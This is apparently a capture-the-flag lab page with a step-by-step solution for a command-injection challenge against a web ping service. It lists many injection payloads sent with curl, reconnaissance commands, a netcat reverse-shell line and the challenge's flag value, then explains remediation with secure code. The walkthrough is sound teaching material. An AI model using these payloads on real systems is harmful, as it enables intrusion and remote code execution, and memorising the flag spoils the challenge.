Labs / Ping Pwn

Challenge
Released 23 Jul 2025

Ping Pwn

Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!

Flags

Points

Challenge

Solution Available

Free Access

Start Lab Environment

Launch your dedicated AWS machine to begin hacking

~1-2 min setup

AWS dedicated

Private instance

Industry standard

Challenge

Ping Pwn - Complete Solution Walkthrough

Step 1: Initial Service Discovery

Challenge Presentation: Access the challenge at <target-ip>:80 to read the challenge description and understand the objectives.
Service Discovery: The challenge indicates a network monitoring service is running. Scan for open ports:

nmap -p 1-10000 <target-ip>

Identify Services: You should find:
- Port 80: Web server hosting the challenge description
- Port 8080: The target network monitoring service
Service Enumeration: Access the monitoring service:

curl http://<target-ip>:8080/

Step 2: Service Analysis and Exploration

Web Interface Analysis: The service presents a "Network Monitoring Tool" with a form interface for testing network connectivity.
Functionality Testing: The service provides a ping functionality through HTTP GET parameters. Test basic functionality:

curl "http://<target-ip>:8080/ping?host=google.com"

Response Analysis: The service returns the output of a ping command, suggesting it executes system commands based on user input.
Parameter Identification: The service accepts a host parameter that appears to be passed directly to a ping command.
Additional Endpoint Discovery: Check for other endpoints:

curl http://<target-ip>:8080/health

Step 3: Vulnerability Identification - Command Injection Testing

Hypothesis: If the service passes user input directly to system commands without proper sanitization, it may be vulnerable to command injection.
Basic Injection Test: Test command chaining using semicolon separator:

curl "http://<target-ip>:8080/ping?host=google.com;whoami"

Expected Result: If vulnerable, you should see both ping output and the result of the whoami command.
Alternative Injection Methods: If semicolons are filtered, test other command separators:

# Using logical AND operator
curl "http://<target-ip>:8080/ping?host=google.com&&id"

# Using logical OR operator  
curl "http://<target-ip>:8080/ping?host=invalidhost||whoami"

# Using backticks for command substitution
curl "http://<target-ip>:8080/ping?host=\`whoami\`"

# Using $() for command substitution
curl "http://<target-ip>:8080/ping?host=\$(id)"

Step 4: System Reconnaissance and Flag Discovery

System Information Gathering: Once command injection is confirmed, gather system information:

# Check current user and groups
curl "http://<target-ip>:8080/ping?host=google.com;id"

# List current directory contents
curl "http://<target-ip>:8080/ping?host=google.com;ls -la"

# Check root directory contents
curl "http://<target-ip>:8080/ping?host=google.com;ls -la /"

# Check working directory
curl "http://<target-ip>:8080/ping?host=google.com;pwd"

Flag File Discovery: Search for flag files in common locations:

# Search for files containing 'flag'
curl "http://<target-ip>:8080/ping?host=google.com;find / -name '*flag*' 2>/dev/null"

# Check for flag.txt in root directory
curl "http://<target-ip>:8080/ping?host=google.com;ls -la /flag.txt"

# Search in common CTF flag locations
curl "http://<target-ip>:8080/ping?host=google.com;find /home /root /tmp -name 'flag*' 2>/dev/null"

Step 5: Flag Extraction

Read the Flag File: Once you locate the flag at /flag.txt, extract its contents:

curl "http://<target-ip>:8080/ping?host=google.com;cat /flag.txt"

Alternative Reading Methods: If cat doesn't work, try alternative approaches:

# Using head command
curl "http://<target-ip>:8080/ping?host=google.com;head /flag.txt"

# Using tail command
curl "http://<target-ip>:8080/ping?host=google.com;tail /flag.txt"

# Using more command
curl "http://<target-ip>:8080/ping?host=google.com;more /flag.txt"

# Using xxd for hex dump
curl "http://<target-ip>:8080/ping?host=google.com;xxd /flag.txt"

Flag Verification: The flag should be in UUID format:

2d14fec8-29c6-4f8d-9fbc-5ce16aceb252

Step 6: Advanced Exploitation Techniques

URL Encoding: If special characters are filtered, use URL encoding:

# URL encoded semicolon (%3B) and space (%20)
curl "http://<target-ip>:8080/ping?host=google.com%3Bcat%20/flag.txt"

# URL encoded ampersand (%26)
curl "http://<target-ip>:8080/ping?host=google.com%26%26cat%20/flag.txt"

Environment Variable Exploitation: Explore environment variables for additional information:

# Display all environment variables
curl "http://<target-ip>:8080/ping?host=google.com;env"

# Check specific variables
curl "http://<target-ip>:8080/ping?host=google.com;echo \$HOME"
curl "http://<target-ip>:8080/ping?host=google.com;echo \$PATH"

Process and Network Information: Gather additional system intelligence:

# List running processes
curl "http://<target-ip>:8080/ping?host=google.com;ps aux"

# Check network connections
curl "http://<target-ip>:8080/ping?host=google.com;netstat -an"

# Check system information
curl "http://<target-ip>:8080/ping?host=google.com;uname -a"

Step 7: Understanding the Vulnerability

Root Cause Analysis: The vulnerability exists because the application uses Python's os.popen() function with user-controlled input without proper sanitization.
Vulnerable Code Pattern: The problematic code likely looks like:

# Vulnerable implementation
command = f"ping -c 1 {host}"
result = os.popen(command).read()

Attack Vector: By including command separators in the host parameter, attackers can append additional commands that get executed by the shell.
Impact Assessment: This vulnerability allows for complete system compromise with the privileges of the web application user.

Step 8: Alternative Exploitation Methods

Python-based Payload: Use Python for more complex operations:

# Python one-liner to read flag
curl "http://<target-ip>:8080/ping?host=google.com;python3 -c 'print(open("/flag.txt").read().strip())'"

Base64 Encoding: If output filtering is implemented, use base64 encoding:

# Base64 encode the flag
curl "http://<target-ip>:8080/ping?host=google.com;cat /flag.txt | base64"

# Decode locally
echo "" | base64 -d

Reverse Shell (Advanced): For persistent access (if needed for other objectives):

# Simple reverse shell (replace with your IP and port)
curl "http://<target-ip>:8080/ping?host=google.com;nc   -e /bin/sh"

Security Implications and Remediation

Vulnerability Classification: This is a critical command injection vulnerability (CWE-78) that allows remote code execution.
Proper Remediation:
- Use parameterized commands instead of string concatenation
- Implement strict input validation with allowlists
- Use subprocess with shell=False in Python
- Apply principle of least privilege
- Implement proper error handling and logging
Secure Implementation Example:

# Secure implementation
import subprocess
import re

# Validate input - only allow valid hostnames/IPs
if re.match(r'^[a-zA-Z0-9.-]+$', host):
    result = subprocess.run(['ping', '-c', '1', host], 
                          capture_output=True, text=True, timeout=10)
    return result.stdout
else:
    return "Invalid host format"

Tools and Techniques Summary

Service Discovery: nmap, curl, manual exploration
Vulnerability Testing: Command injection payloads, multiple separator types
Data Extraction: System commands (cat, find, ls), file operations
Encoding/Bypasses: URL encoding, base64 encoding, alternative commands
Post-Exploitation: System reconnaissance, environment analysis